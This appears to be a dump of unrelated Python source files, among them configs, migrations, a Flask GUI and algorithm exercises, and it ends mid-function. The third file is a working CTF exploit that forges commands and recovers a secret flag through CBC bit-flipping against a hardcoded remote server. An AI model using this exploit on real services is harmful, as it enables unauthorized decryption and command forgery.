# Fallback socket-connection config, used when running on localhost or when
# no APP_CFG environment value is provided.
# BUG FIX: the original defined this identical literal twice back-to-back
# (copy-paste duplication); the redundant second assignment was removed.
LOCAL_APP_CFG = """
{
    "SOCKET_CONNECTIONS": [
        {
            "url_slug": "dxfeed",
            "source_type": "dxfeed",
            "HOST": "127.0.0.1",
            "PORT": 1234
        },
        {
            "url_slug": "dxfeed",
            "source_type": "mc_fix",
            "HOST": "127.0.0.1",
            "PORT": 4321
        }
    ]
}
"""
APP_CFG = config("APP_CFG", LOCAL_APP_CFG)

try:
    if ENVIRONMENT == "localhost":
        SOCKET_CONNECTIONS = json.loads(LOCAL_APP_CFG).get(
            "SOCKET_CONNECTIONS"
        )
    else:
        SOCKET_CONNECTIONS = json.loads(APP_CFG).get("SOCKET_CONNECTIONS")
    # Map each port (as a string) to its feed type for handler lookup.
    SOCKET_SOURCE_TYPES = {
        f"{connection.get('PORT')}": connection.get("source_type")
        for connection in SOCKET_CONNECTIONS
    }
except Exception as e:
    # Malformed configuration is fatal: the service cannot run without its
    # socket-connection definitions.
    logging.error("failed to get socket connections configuration")
    logging.error(e)
    sys.exit(1)

# data validation
ASSET_DECIMAL_PLACES = 10
| 3,051 | 1,212 |
#This problem was asked by Amazon.
#Given an integer k and a string s, find the length of the longest substring that contains at most k distinct characters.
#For example, given s = "abcba" and k = 2, the longest substring with k distinct characters is "bcb".
def DCP_13(s, k):
    """Print the length of the longest substring of `s` that contains at
    most `k` distinct characters.

    Fixes three defects in the original version:
      * a missing colon after the inner `while` (SyntaxError);
      * the `k == 1` shortcut always printed 1, under-counting repeated
        runs (e.g. s="aab", k=1 should print 2);
      * windows that reached the end of the string had their final
        character trimmed unconditionally by `[:-1]`, under-counting
        suffix substrings (e.g. s="abbcc", k=2 printed 3 instead of 4).

    Uses an O(n) sliding window instead of the original O(n^2) scan.

    :param s: Input string.
    :param k: Maximum number of distinct characters allowed.
    """
    # Cap k at the number of distinct characters actually present.
    k = min(len(set(s)), k)
    if k <= 0:
        # Empty string (or non-positive k): the only valid substring is "".
        print(0)
        return

    char_counts = {}
    best_length = 0
    left = 0
    for right, character in enumerate(s):
        char_counts[character] = char_counts.get(character, 0) + 1
        # Shrink from the left until the window holds <= k distinct chars.
        while len(char_counts) > k:
            left_char = s[left]
            char_counts[left_char] -= 1
            if char_counts[left_char] == 0:
                del char_counts[left_char]
            left += 1
        best_length = max(best_length, right - left + 1)
    print(best_length)
# Exercise DCP_13 on the prompt example plus edge cases; the expected
# printed length is noted next to each case.
_cases = [
    ("abcba", 2),  # 3  -- example from the prompt
    ("abcba", 3),  # 5  -- k equals the number of distinct characters
    ("abcba", 4),  # 5  -- k exceeds the number of distinct characters
    ("bbcba", 2),  # 4  -- repeated values
    ("find the length of the longest substring that contains at most k distinct characters", 5),  # 8  -- longer string
    ("Given an integer k and a string s, find the length of the longest substring that contains at most k distinct characters.", 16),  # 64 -- larger k
]
for s, k in _cases:
    DCP_13(s, k)
#solve time : 1h50m incl notes,comments
#the main challenges here were making the function robust to repeated elements.
#I tried to implement dynamic programming to speed up execution time.
##beta soln's, complex and dont handle special cases (repeated digits, etc.)
#def DCP_13(s,k):
# #trivial if k=1
# if k == 1:
# print(1)
# else:
# #count rightmost digit index added to sol'n
# i=0
# #count leftmost digit index saved to sol'n
# j=0
# #starting sol'n w at the beginning of the string
# left=s[i:k+i]
# #save sol'n value
# out=str()
# #iterate over all sections of the string
# while i+k < len(s):
# i=i+1
# #store the next possible starting point w/ k-elements
# right=s[j:k+i]
# if len(set(right)) > k :
# j=j+1
# right=s[j:k+i]
# #test whether the adjacent starting points have the same elements
# if set(left).issubset( set(right) ) :#set(left) == set(right):
# left=s[j:k+i]
# out=left
# else:
# left=s[i:k+i]
# j=j+1
# print(len(out))
#finish:10:58
#
#def DCP_13(s,k):
# i=0
# j=0
# left=str()
# out=str()
# while j+1 != i :
# while len(set(left)) <= k:
# left=s[j:i+1]
# i=i+1
# out = left[:-1]
# j=j+len(out)
# left=str()
# return print(len(out))
| 3,673 | 1,293 |
import base64
import hashlib
import re
import string
import itertools
from crypto_commons.netcat.netcat_commons import receive_until_match, nc, send, receive_until
from crypto_commons.symmetrical.symmetrical import set_byte_cbc, set_cbc_payload_for_block
def PoW(suffix, digest):
    """Brute-force the server's proof-of-work.

    Searches every 4-character prefix p drawn from [A-Za-z0-9] until
    sha256(p + suffix) hex-digests to `digest`; returns p, or None if no
    prefix matches.  Python 2 code: hashlib is fed a plain str.
    """
    for prefix in itertools.product(string.ascii_letters + string.digits, repeat=4):
        p = "".join(prefix)
        if hashlib.sha256(p + suffix).hexdigest() == digest:
            return p
def pad(msg):
    """PKCS#7-style padding: extend msg to a multiple of 16 bytes, each pad
    byte holding the pad length (a full 16-byte block for aligned input)."""
    fill = 16 - (len(msg) % 16)
    return msg + fill * chr(fill)
def generate_payload_from_message(encrypted, plaintext, new_payload):
    """Build a CBC bit-flipping payload.

    Given a base64 ciphertext whose second block decrypts to `plaintext`,
    flip bytes (via set_cbc_payload_for_block) so that block decrypts to
    `new_payload` instead; returns the modified ciphertext, base64-encoded.
    Python 2 code: uses str.decode("base64").
    """
    raw = encrypted.decode("base64")
    new_payload = pad(new_payload)[:16]
    # Prepend a zero block so index 1 addresses the first real data block.
    plaintext = ("\0" * 16) + (pad(plaintext)[:16])
    payload = set_cbc_payload_for_block(raw, plaintext, new_payload, 1)
    return base64.b64encode(payload)
def main():
    """Run the full exploit against the remote CBC oracle.

    Steps: solve the proof-of-work, malleate the 'Welcome!' ciphertext into a
    'get-flag' command, then recover the flag plaintext block by block using
    the server as an encryption-comparison oracle.  Python 2 throughout.
    """
    s = nc("52.193.157.19", 9999)
    # Server sends "SHA256(XXXX+<suffix>) == <digest>"; brute-force XXXX.
    data = receive_until_match(s, "Give me XXXX:")
    inputs = re.findall("SHA256\(XXXX\+(.*)\) == (.*)", data)[0]
    suffix = inputs[0]
    digest = inputs[1]
    result = PoW(suffix, digest)
    print("PoW done")
    send(s, result)
    receive_until_match(s, "Done!\n")
    # The first ciphertext encrypts "Welcome!"; flip it into a get-flag command.
    welcome = receive_until(s, "\n")[:-1]
    get_flag_payload = generate_payload_from_message(welcome, "Welcome!", "get-flag")
    send(s, get_flag_payload)
    encrypted_flag = receive_until(s, "\n")[:-1]
    raw_enc_flag = encrypted_flag.decode("base64")
    current = "hitcon{"  # known flag prefix, seeds the guessing loop
    print('encrypted flag', encrypted_flag, encrypted_flag.decode("base64"), len(encrypted_flag.decode("base64")))
    for block_to_recover in range(3):
        # Drop leading blocks so the target block sits where the oracle reads it.
        malleable_block = base64.b64encode(raw_enc_flag[block_to_recover * 16:])
        missing = 16 - len(current)
        for spaces in range(missing):
            for c in string.printable:
                # Guess the next plaintext char: a correct guess makes the
                # server re-encrypt to the ciphertext we already hold.
                test_flag_block_prefix = current + c + ("\0" * (missing - spaces))
                expected_command = (" " * spaces) + "get-flag"
                payload = generate_payload_from_message(malleable_block, test_flag_block_prefix, expected_command)
                send(s, payload)
                result = receive_until(s, "\n")[:-1]
                if result == encrypted_flag:
                    current += c
                    print('found matching flag char:', current)
                    break
        print(current)
        # Recover the start of the NEXT block via the get-md5 command,
        # appending known ciphertext so padding still validates.
        known_blocks = raw_enc_flag[16 * block_to_recover:16 * block_to_recover + 32]
        expanded_flag = raw_enc_flag[16 * block_to_recover:] + known_blocks  # appending IV and "Welcome!!" at the end
        next_block_known = ""
        for i in range(8):
            get_md5 = set_cbc_payload_for_block(expanded_flag, "\0" * 16 + current, (" " * 9) + "get-md5", 1)  # first block is get-md5
            # Adjust the final byte so the padding cuts off the unknown tail.
            get_md5 = set_byte_cbc(get_md5, ("\0" * (5 - block_to_recover) * 16) + current,
                                   (6 - block_to_recover) * 16 - 1, chr((4 - block_to_recover) * 16 - i - 1))  # last character to cut padding
            send(s, base64.b64encode(get_md5))
            real_md5_result = receive_until(s, "\n")[:-1]
            for c in string.printable:
                # Shift one more guessed char into the md5'd window and compare.
                test_md5_payload = set_cbc_payload_for_block(expanded_flag, "\0" * 16 + current,
                                                             (" " * (8 - i - 1)) + "get-md5" + next_block_known + c, 1)
                test_md5_payload = set_byte_cbc(test_md5_payload, ("\0" * (5 - block_to_recover) * 16) + current,
                                                (6 - block_to_recover) * 16 - 1,
                                                chr((4 - block_to_recover) * 16 + 1))
                send(s, base64.b64encode(test_md5_payload))
                test_md5_result = receive_until(s, "\n")[:-1]
                if real_md5_result == test_md5_result:
                    next_block_known += c
                    print('found matching flag char:', next_block_known)
                    break
            print(next_block_known)
        # Carry the recovered prefix into the next block's first phase.
        current = next_block_known[:-1]
# Script entry point; note there is no `if __name__ == "__main__"` guard,
# so the exploit runs on import as well.
main()
| 4,049 | 1,391 |
import configparser
import re
import sys
import os
from typing import Optional, Mapping, Iterator, Any, List, Dict
# Built-in defaults applied before any config file is read (see Settings.load).
_default_settings = {
    "node": {
        "id.message": "Terrestrial Amateur Radio Packet Network node ${node.alias} op is ${node.call}",
        "id.interval": 600,
        "admin.enabled": False,
        "admin.listen": "0.0.0.0",
        "admin.port": 8888
    },
    "network": {
        "netrom.ttl": 7,
        "netrom.obs.min": 4,
        "netrom.obs.init": 6,
        "netrom.nodes.quality.min": 73,
        "netrom.nodes.interval": 300
    }
}
# Defaults merged into every [port:N] section (see PortConfig.from_dict).
_default_port_settings = {
    "port.enabled": True,
    "serial.timeout": 0.100
}
def _default_basedir(app_name):
# taken from http://stackoverflow.com/questions/1084697/
if sys.platform == "darwin":
import appdirs
return appdirs.user_data_dir(app_name, "")
elif sys.platform == "win32":
return os.path.join(os.environ["APPDATA"], app_name)
else:
return os.path.expanduser(os.path.join("~", "." + app_name.lower()))
class Settings:
    """Layered INI configuration for the node.

    Built-in defaults (_default_settings) are applied first, then each file
    in *paths* (resolved relative to *basedir*) is read on top of them.
    """

    def __init__(self, basedir: str = None, paths: List[str] = None, defaults: Dict = None):
        """
        :param basedir: base folder for config files; defaults to the
            platform-specific TARPN data dir (created if missing).
        :param paths: config file names relative to basedir.  BUG FIX: a
            None value (the declared default!) used to raise TypeError when
            iterated; it now means "no config files".
        :param defaults: extra ConfigParser defaults for the default section.
        """
        self._init_basedir(basedir)
        self._configfiles = [os.path.join(self._basedir, path) for path in (paths or [])]
        self._config: Optional[configparser.ConfigParser] = None
        # Copy-by-reference of caller's dict is intentional; just never share
        # a mutable default between instances.
        self._defaults = dict() if defaults is None else defaults
        self.load()

    def _init_basedir(self, basedir):
        # Resolve and eagerly create the base folder: nothing else can work
        # without a writable base directory.
        if basedir is not None:
            self._basedir = basedir
        else:
            self._basedir = _default_basedir("TARPN")
        if not os.path.isdir(self._basedir):
            try:
                os.makedirs(self._basedir)
            except Exception:
                print(f"Could not create base folder at {self._basedir}. This is a fatal error, TARPN "
                      "cannot run without a writable base folder.")
                raise

    def load(self):
        """(Re)parse defaults plus all configured files.

        :raises RuntimeError: if any configured file does not exist.
        """
        self._config = configparser.ConfigParser(defaults=self._defaults,
                                                 interpolation=configparser.ExtendedInterpolation(),
                                                 inline_comment_prefixes=";",
                                                 default_section="default")
        self._config.read_dict(_default_settings)
        for path in self._configfiles:
            if os.path.exists(path):
                self._config.read(path)
            else:
                raise RuntimeError(f"No such config file {path}")

    def save(self):
        # Persistence is not implemented yet; kept as a no-op placeholder.
        # self._config.write()
        return

    def node_config(self):
        """Typed view over the [node] section."""
        return NodeConfig(self._config["node"])

    def port_configs(self):
        """One PortConfig per [port:N] section, in discovery order."""
        ports = []
        for section in self._config.sections():
            m = re.match(r"port:(\d+)", section)
            if m:
                ports.append(int(m.group(1)))
        port_configs = []
        for port in ports:
            port_sect = self._config[f"port:{port}"]
            port_configs.append(PortConfig.from_dict(port, port_sect))
        return port_configs

    def network_configs(self):
        """Typed view over the [network] section."""
        return NetworkConfig(self._config["network"])

    def app_configs(self):
        """One AppConfig per [app:name] section."""
        apps = []
        for section in self._config.sections():
            m = re.match(r"app:(\w[\w\d]*)", section)
            if m:
                apps.append(m.group(1))
        app_configs = []
        for app in apps:
            app_sect = self._config[f"app:{app}"]
            app_configs.append(AppConfig.from_dict(app, app_sect))
        return app_configs

    def config_section(self, name):
        """Raw Config wrapper over an arbitrary named section."""
        return Config(name, self._config[name])
class Config(Mapping):
    """Read-only, Mapping-like wrapper around one ConfigParser section with
    typed getters that raise KeyError when neither value nor default exists."""

    def __init__(self, section_name, config_section):
        self._section = section_name
        self._config_section = config_section

    def __getitem__(self, k) -> Any:
        return self._config_section[k]

    def __len__(self) -> int:
        return len(self._config_section)

    def __iter__(self) -> Iterator:
        return iter(self._config_section)

    def __repr__(self) -> str:
        return f"{self._section}: {dict(self._config_section)}"

    def as_dict(self) -> dict:
        return dict(self._config_section)

    def _resolve(self, key, raw_value, default):
        """Return raw_value, falling back to default; KeyError if both unset."""
        if raw_value is not None:
            return raw_value
        if default is not None:
            return default
        raise KeyError(f"Unknown key {key} in section {self._section}")

    def get(self, key, default: str = None) -> str:
        return self._resolve(key, self._config_section.get(key), default)

    def get_int(self, key, default: int = None) -> int:
        return self._resolve(key, self._config_section.getint(key), default)

    def get_float(self, key, default: float = None) -> float:
        return self._resolve(key, self._config_section.getfloat(key), default)

    def get_boolean(self, key, default: bool = None) -> bool:
        return self._resolve(key, self._config_section.getboolean(key), default)
class NodeConfig(Config):
    """Typed accessors for the [node] configuration section."""

    def __init__(self, config_section):
        super().__init__("node", config_section)

    def node_call(self) -> str:
        return self.get("node.call")

    def node_alias(self) -> str:
        return self.get("node.alias")

    def admin_enabled(self) -> bool:
        return self.get_boolean("admin.enabled")

    def admin_port(self) -> int:
        return self.get_int("admin.port")

    def admin_listen(self) -> str:
        return self.get("admin.listen")
class PortConfig(Config):
    """Typed accessors for a [port:N] configuration section."""

    def __init__(self, port_id, port_config):
        super().__init__(f"port:{port_id}", port_config)
        self._port_id = port_id

    def port_id(self):
        return self._port_id

    def port_type(self):
        return self.get("port.type")

    @classmethod
    def from_dict(cls, port_id: int, configs: dict):
        """Build a PortConfig from a plain dict, applying the port defaults."""
        section = f"port:{port_id}"
        parser = configparser.ConfigParser(defaults=_default_port_settings)
        parser.read_dict({section: configs})
        return cls(port_id, parser[section])
class NetworkConfig(Config):
    """Typed accessors for the [network] (NET/ROM) configuration section."""

    def __init__(self, config_section):
        super().__init__("network", config_section)

    def ttl(self) -> int:
        return self.get_int("netrom.ttl")

    def min_obs(self) -> int:
        return self.get_int("netrom.obs.min")

    def init_obs(self) -> int:
        return self.get_int("netrom.obs.init")

    def min_qual(self) -> int:
        return self.get_int("netrom.nodes.quality.min")

    def nodes_interval(self) -> int:
        return self.get_int("netrom.nodes.interval")

    def node_call(self) -> str:
        return self.get("netrom.node.call")

    def node_alias(self) -> str:
        return self.get("netrom.node.alias")

    @classmethod
    def from_dict(cls, configs: dict):
        """Build a NetworkConfig from a plain dict, applying network defaults."""
        parser = configparser.ConfigParser(defaults=_default_settings["network"])
        parser.read_dict({"network": configs})
        return cls(parser["network"])
class AppConfig(Config):
    """Typed accessors for an [app:name] configuration section."""

    def __init__(self, app_name, app_config):
        super().__init__(f"app:{app_name}", app_config)
        self._app_name = app_name

    def app_name(self):
        return self._app_name

    def app_call(self):
        return self.get("app.call")

    def app_alias(self):
        return self.get("app.alias")

    def app_socket(self):
        return self.get("app.sock")

    def app_module(self):
        return self.get("app.module")

    @classmethod
    def from_dict(cls, app_name: str, configs: dict):
        """Build an AppConfig from a plain dict (no extra defaults applied)."""
        section = f"app:{app_name}"
        parser = configparser.ConfigParser()
        parser.read_dict({section: configs})
        return cls(app_name, parser[section])
| 8,170 | 2,491 |
# Copyright (c) 2017, Frappe and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils.nestedset import rebuild_tree
def execute():
    """Migration patch: move per-asset depreciation settings into the new
    'finance_books' child table on Asset and Asset Category, copy the old
    warehouse link into location, and attach existing depreciation
    schedules to finance book 1.
    """
    # Reload doctypes so the new child-table fields exist before writing.
    frappe.reload_doc('assets', 'doctype', 'asset_finance_book')
    frappe.reload_doc('assets', 'doctype', 'depreciation_schedule')
    frappe.reload_doc('assets', 'doctype', 'asset_category')
    frappe.reload_doc('assets', 'doctype', 'asset')
    frappe.reload_doc('assets', 'doctype', 'asset_movement')
    frappe.reload_doc('assets', 'doctype', 'asset_category_account')
    if frappe.db.has_column("Asset", "warehouse"):
        # Asset used to link a Warehouse; carry its display name into location.
        frappe.db.sql(""" update `tabAsset` ast, `tabWarehouse` wh
set ast.location = wh.warehouse_name where ast.warehouse = wh.name""")
    for d in frappe.get_all('Asset'):
        doc = frappe.get_doc('Asset', d.name)
        if doc.calculate_depreciation:
            # Mirror the flat depreciation fields into a finance_books row.
            fb = doc.append('finance_books', {
                'depreciation_method': doc.depreciation_method,
                'total_number_of_depreciations': doc.total_number_of_depreciations,
                'frequency_of_depreciation': doc.frequency_of_depreciation,
                'depreciation_start_date': doc.next_depreciation_date,
                'expected_value_after_useful_life': doc.expected_value_after_useful_life,
                'value_after_depreciation': doc.value_after_depreciation
            })
            fb.db_update()
    # Point every existing schedule row at the first (and only) finance book.
    frappe.db.sql(""" update `tabDepreciation Schedule` ds, `tabAsset` ast
set ds.depreciation_method = ast.depreciation_method, ds.finance_book_id = 1 where ds.parent = ast.name """)
    for category in frappe.get_all('Asset Category'):
        # NOTE(review): passes the whole get_all row rather than category.name
        # (the Asset loop above uses d.name) -- confirm frappe.get_doc accepts
        # a row object here.
        asset_category_doc = frappe.get_doc("Asset Category", category)
        row = asset_category_doc.append('finance_books', {
            'depreciation_method': asset_category_doc.depreciation_method,
            'total_number_of_depreciations': asset_category_doc.total_number_of_depreciations,
            'frequency_of_depreciation': asset_category_doc.frequency_of_depreciation
        })
        row.db_update()
"""
Web GUI
Author: Irfan Chahyadi
Source: github.com/irfanchahyadi/Scraping-Manga
"""
# IMPORT REQUIRED PACKAGE
from flask import Flask, render_template, request, redirect, url_for, Response
import os, webbrowser, time
from gui import web_api
import main
# Flask application serving the scraper's web GUI.
app = Flask(__name__)
@app.route('/tes')
def tes():
    """Test route rendering the alternate index template."""
    return render_template('index2.html')
@app.route('/')
def home():
    """Main page: list the known manga and available languages."""
    manga = web_api.get_manga()
    lang = web_api.get_lang()
    return render_template('index.html', data={'manga': manga, 'lang': lang})
@app.route('/crawl/<path:id_lang>')
def crawl(id_lang):
    """Kick off a crawl; `id_lang` is '<manga id>_<language id>'."""
    manga_id, lang_id = id_lang.split('_')
    web_api.get(manga_id, lang_id)
    return redirect(url_for('home'))
@app.route('/stop_crawl')
def stop_crawl():
    """Ask the crawler to stop; respond with 204 No Content."""
    web_api.stop()
    return ('', 204)
@app.route('/shutdown')
def shutdown():
    """Stop the development server and show a goodbye page."""
    shutdown_server()
    return "Bye, see other project on <a href='https://github.com/irfanchahyadi'>github.com/irfanchahyadi</a>"
def shutdown_server():
    """Shut down the Werkzeug development server from inside a request.

    NOTE(review): the 'werkzeug.server.shutdown' environ hook was removed
    in Werkzeug 2.1 -- this only works with older versions; confirm the
    pinned dependency.
    """
    func = request.environ.get('werkzeug.server.shutdown')
    if func is None:
        raise RuntimeError('Not running with the Werkzeug Server')
    func()
@app.route('/progress')
def progress():
    """Server-sent-events stream reporting crawl progress.

    Emits one JSON event every 0.5s, capped at 201 events so an abandoned
    client connection eventually terminates.
    """
    import json  # local import: only this endpoint needs it

    def generate():
        for _ in range(201):  # same count as the original `while x <= 200`
            # BUG FIX: the event used to be assembled by string concatenation,
            # which produced invalid JSON whenever the manga title contained
            # a quote or backslash; json.dumps escapes it correctly.
            payload = json.dumps({
                'now': main.crawl_now,
                'end': main.crawl_end,
                'manga': main.crawl_manga,
            })
            yield 'data: ' + payload + '\n\n'
            time.sleep(0.5)
    return Response(generate(), mimetype='text/event-stream')
@app.route('/new_manga', methods=['POST'])
def new_manga():
    """Handle the add-manga form (multipart: text fields + cover image)."""
    form = request.form.to_dict()
    imageFile = request.files['imageFile']
    web_api.add_manga(form, imageFile)
    return redirect(url_for('home'))
# Open the GUI in the default browser, then start the (blocking) dev server.
# NOTE(review): executes at import time -- there is no __main__ guard.
webbrowser.open_new_tab('http://localhost:5000/')
app.run(host='0.0.0.0')
| 1,709 | 663 |
#!/usr/bin/env python3
# Author: Joel Gruselius, Dec 2018
# Script for checking index clashes
# Input one or several nucleotide sequences and print any matches found in
# the index reference file. This version is only good for checking for
# full matches.
# It is pretty useful though to list overlapping indexes in the reference file.
# Usage:
# index_finder --ref <reference_list> <index_seq>...
# TODO: Show sequences matching the first six bases not just complete matches
# TODO: Specify cache dir
import sys
import argparse
import re
import hashlib
import json
import os
import errno
COMPL_MAP = {"A": "T", "T": "A", "C": "G", "G": "C"}
def file_hash(path):
    """Return the hex MD5 digest of the file at *path*, read in 64 KiB chunks."""
    chunk_size = 65536
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
def rev(seq):
    """Return *seq* reversed."""
    return "".join(reversed(seq))
def compl(seq):
    """Return the nucleotide complement of *seq* (no reversal)."""
    return "".join(COMPL_MAP[nt] for nt in seq)
def rev_compl(seq):
    """Return the reverse complement of *seq*."""
    return "".join(COMPL_MAP[nt] for nt in reversed(seq))
# Build a dict of known index sequences from a text file:
def build_index_dict(path, length):
    """Scan *path* for index sequences and map each to its source lines.

    When *length* is None any run of >= 4 bases (ATCGN, not preceded by a
    base) counts; otherwise only runs of exactly *length* letters match.
    Returns {sequence: [stripped line, ...]}.
    """
    if length is None:
        pattern = re.compile(r"(?<![ATCG])[ATCGN]{4,}")
    else:
        pattern = re.compile(r"(?<![ATCG])[ATCGN]{{{}}}".format(length))
    index = {}
    with open(path, "r") as handle:
        for raw_line in handle:
            # De-duplicate matches within a single line before recording.
            for seq in set(pattern.findall(raw_line)):
                index.setdefault(seq, []).append(raw_line.strip())
    return index
def load_index_dict(path):
    """Load a previously cached index dict from the JSON file at *path*."""
    with open(path, "r") as handle:
        return json.load(handle)
def save_index_dict(obj, path):
    """Serialize *obj* to *path* as JSON (index-dict cache file)."""
    with open(path, "w") as handle:
        json.dump(obj, handle)
def print_index_dict(ref_dict):
    """Print every sequence that maps to more than one reference line."""
    for seq, entries in ref_dict.items():
        if len(entries) < 2:
            continue
        print(seq)
        for entry in entries:
            print("\t{}".format(entry))
def main(args):
    """Resolve the reference index (building and caching it as needed), then
    either list duplicate indexes (--list) or look up each query sequence.

    :param args: argparse namespace with ref, rebuild, length, list, seqs.
    :raises OSError: if the reference file does not exist.
    """
    if not os.path.isfile(args.ref):
        # File not found
        raise OSError(errno.ENOENT, os.strerror(errno.ENOENT), args.ref)
    # Cache name is keyed on the reference file's content hash plus the
    # requested length, so edits to the reference invalidate the cache.
    # NOTE(review): the cache is written to the current working directory.
    md5 = file_hash(args.ref)
    cache = "{}{}.json".format(md5, args.length or "")
    if not args.rebuild and os.path.isfile(cache):
        print("Loading cached index dict ({})".format(cache), file=sys.stderr)
        ref_dict = load_index_dict(cache)
    else:
        ref_dict = build_index_dict(args.ref, args.length)
        print("Caching index dict ({})".format(cache), file=sys.stderr)
        save_index_dict(ref_dict, cache)
    if args.list:
        # Report non-unique indexes, then summary counts.
        print_index_dict(ref_dict)
        n = 0
        for x in ref_dict.values():
            n += len(x)
        print("\nTotal barcodes parsed in reference dict: {}".format(n))
        print("Unique barcodes in reference dict: {}".format(len(ref_dict)))
    else:
        for arg in args.seqs:
            # Truncate queries to the configured length so full matches work.
            if args.length:
                seq = arg[:args.length]
            else:
                seq = arg
            if seq in ref_dict:
                matches = ref_dict[seq]
                print("{} found in:".format(seq))
                for m in matches:
                    print("\t{}".format(m))
            else:
                print("{}: No matches found".format(seq))
if __name__ == "__main__":
p = argparse.ArgumentParser(description="Find index clashes")
g = p.add_mutually_exclusive_group(required=True)
g.add_argument("--seqs", nargs="+", help="All sequences to search for")
g.add_argument("--list", action="store_true", default=False,
help="Print non-unique indexes in the reference list")
p.add_argument("--ref", required=True, help="Reference text file containing"
" known index sequences")
p.add_argument("--rebuild", action="store_true", help="Don't use any cached"
" reference object")
p.add_argument("--length", type=int, choices=range(4,8), help="Set the "
"number of letters to consider, both in the query strings and "
"when building the reference")
main(p.parse_args())
| 4,144 | 1,334 |
# Generated by Django 3.2.5 on 2021-07-20 19:37
import cloudinary.models
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated migration: store project and profile images on
    Cloudinary instead of the previous field type."""

    dependencies = [
        ('AwardsApp', '0006_userprofile_bio'),
    ]

    operations = [
        migrations.AlterField(
            model_name='project',
            name='project_image',
            field=cloudinary.models.CloudinaryField(max_length=255, verbose_name='images'),
        ),
        migrations.AlterField(
            model_name='userprofile',
            name='profile_photo',
            field=cloudinary.models.CloudinaryField(max_length=255, verbose_name='profile'),
        ),
    ]
| 658 | 206 |
"""input manatees: a list of "manatees", where one manatee is represented by a dictionary
a single manatee has properties like "name", "age", et cetera
n = the number of elements in "manatees"
m = the number of properties per "manatee" (i.e. the number of keys in a manatee dictionary)"""
# Efficiency: O(n)
def example1(manatees):
    # Single pass over the list: prints each manatee's name once.
    # (Python 2 print statement.)
    for manatee in manatees:
        print manatee['name']
# Efficiency: O(1)
def example2(manatees):
    # Constant time: only the first element is touched, regardless of list
    # size.  Raises IndexError on an empty list.  (Python 2 print statements.)
    print manatees[0]['name']
    print manatees[0]['age']
# Efficiency: O(n*m)
def example3(manatees):
    # Nested iteration: prints every property of every manatee, so the work
    # is n manatees times m properties each.  (Python 2 print statement.)
    for manatee in manatees:
        for manatee_property in manatee:
            print manatee_property, ": ", manatee[manatee_property]
# Efficiency: O(n^2)
def example4(manatees):
    # Compares every pair of manatees (n*n comparisons).
    # NOTE(review): the if/else overwrites oldest_manatee on EVERY pair, so
    # the final value is merely the older of the last pair compared, not the
    # globally oldest manatee -- this example illustrates O(n^2) cost, not a
    # correct algorithm.  (Python 2 print statement.)
    oldest_manatee = "No manatees here!"
    for manatee1 in manatees:
        for manatee2 in manatees:
            if manatee1['age'] < manatee2['age']:
                oldest_manatee = manatee2['name']
            else:
                oldest_manatee = manatee1['name']
    print oldest_manatee
from django.urls import reverse
from address.models import Address
from core.tests import BaseTestSimpleApiMixin
from thairod.utils.test_util import APITestCase
from warehouse.models import Warehouse
class WarehouseAPITestCase(BaseTestSimpleApiMixin, APITestCase):
    """CRUD API tests for Warehouse; the actual test methods come from the
    shared BaseTestSimpleApiMixin, this class only supplies fixtures."""

    def setUp(self):
        # NOTE(review): assumes Warehouse and Address rows already exist
        # (presumably loaded by the base test case's fixtures) -- confirm.
        self.model = Warehouse
        self.obj = Warehouse.objects.first()
        self.address = Address.objects.first()
        self.list_url = reverse('warehouse-list')
        self.detail_url = reverse('warehouse-detail', kwargs={'pk': self.obj.pk})
        # Minimal payload accepted by the create/update endpoints.
        self.valid_field = {
            "name": "warehouse name",
            "address": self.address.pk,
            "tel": "0987654321",
        }
| 695 | 217 |
import datetime
import logging
import logging.handlers
import os
import atexit
from flask import Flask, request, g
from flask_login import current_user
from flask_cors import CORS
from importlib import reload
from urllib.parse import urlsplit
import meltano
from meltano.core.project import Project
from meltano.core.tracking import GoogleAnalyticsTracker
from meltano.core.plugin.error import PluginMissingError
from meltano.core.plugin.settings_service import (
PluginSettingsService,
PluginSettingMissingError,
)
from meltano.core.config_service import ConfigService
from meltano.core.compiler.project_compiler import ProjectCompiler
from meltano.core.tracking import GoogleAnalyticsTracker
from meltano.core.db import project_engine
logger = logging.getLogger(__name__)
def create_app(config={}):
    """Build and configure the Meltano UI Flask application.

    Config precedence: meltano.api.config defaults < instance ui.cfg <
    the explicit `config` argument.  (The mutable default is only read via
    app.config.update, never mutated, so it is safe if unidiomatic.)
    """
    project = Project.find()
    app = Flask(
        __name__, instance_path=str(project.root), instance_relative_config=True
    )
    app.config.from_object("meltano.api.config")
    app.config.from_pyfile("ui.cfg", silent=True)
    app.config.update(**config)
    # register
    project_engine(
        project, engine_uri=app.config["SQLALCHEMY_DATABASE_URI"], default=True
    )
    # Initial compilation
    compiler = ProjectCompiler(project)
    try:
        compiler.compile()
    except Exception as e:
        # Best effort: a failed compile should not block UI startup.
        # NOTE(review): the exception is silently dropped -- consider logging.
        pass
    # Logging
    file_handler = logging.handlers.RotatingFileHandler(
        str(project.run_dir("meltano-ui.log")), backupCount=3
    )
    stdout_handler = logging.StreamHandler()
    logger.setLevel(logging.DEBUG)
    logger.addHandler(file_handler)
    logger.addHandler(stdout_handler)
    # 1) Extensions
    security_options = {}
    from .models import db
    from .mail import mail
    from .executor import setup_executor
    from .security import security, users, setup_security
    from .security.oauth import setup_oauth
    from .json import setup_json
    db.init_app(app)
    mail.init_app(app)
    setup_executor(app, project)
    setup_security(app, project)
    setup_oauth(app)
    setup_json(app)
    CORS(app, origins="*")
    # 2) Register the URL Converters
    from .url_converters import PluginRefConverter
    app.url_map.converters["plugin_ref"] = PluginRefConverter
    # 3) Register the controllers
    from .controllers.root import root
    from .controllers.dashboards import dashboardsBP
    from .controllers.reports import reportsBP
    from .controllers.repos import reposBP
    from .controllers.settings import settingsBP
    from .controllers.sql import sqlBP
    from .controllers.orchestrations import orchestrationsBP
    from .controllers.plugins import pluginsBP
    app.register_blueprint(root)
    app.register_blueprint(dashboardsBP)
    app.register_blueprint(reportsBP)
    app.register_blueprint(reposBP)
    app.register_blueprint(settingsBP)
    app.register_blueprint(sqlBP)
    app.register_blueprint(orchestrationsBP)
    app.register_blueprint(pluginsBP)
    if app.config["PROFILE"]:
        from .profiler import init
        init(app)
    # Google Analytics setup
    tracker = GoogleAnalyticsTracker(project)

    @app.before_request
    def setup_js_context():
        """Populate g.jsContext with the values the frontend expects."""
